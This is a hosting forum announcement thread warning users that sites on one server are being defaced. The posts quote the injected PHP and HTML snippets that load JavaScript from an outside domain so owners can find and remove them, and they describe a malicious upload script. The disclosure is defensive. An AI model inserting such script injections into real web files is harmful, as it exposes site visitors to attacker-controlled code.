FRIHOST FORUMS SEARCH FAQ TOS BLOGS COMPETITIONS
You are invited to Log in or Register a free Frihost Account!


Websites hacked/defaced on Server 2





Bondings
It seems like a worm/hacker is currently trying to hack/deface websites on server 2, mostly when directories/files are chmod to 777. Most of the time the following code is added to the files:
Code:
<? if (!defined('domainstat')) { define("domainstat", "ok");  echo "<script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php?id=4fe6d'></script>";}?>


If you have problems with your website, get popups or "header already sent out" error, please look for this code in the source code of the php files in question and remove it.

I'm currently trying to change some settings on the server to prevent future attempts, or at least make it harder.

I also disabled register_globals on server 2. register_globals puts variables submitted by users as variables in php as $variable instead of $_POST['variable'] or $_GET['variable']. This is quite insecure and that's why I disabled it now.

If you need it for your website, you need to place the following line in a .htaccess file in the directory in question.
Code:
php_flag register_globals on
wumingsden
The JavaScript code might have also been added to your HTML files. The exact code is the following:

Code:
<script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php?id=c55503e1'></script>
Daniel15
Upon investigation by me, it appears that the hacker will try upload a script called 'insert.php' into your forum's uploads folder, and then either try to run the script, or set the script as their avatar, hoping that someone else will run it.

My suggestion is to update all scripts to the latest versions, and make sure you have secure passwords.
Related topics
This topic is locked: you cannot edit posts or make replies.    Frihost Forum Index -> General -> Announcements and Rules

FRIHOST HOME | FAQ | TOS | ABOUT US | CONTACT US | SITE MAP
© 2005-2011 Frihost, forums powered by phpBB.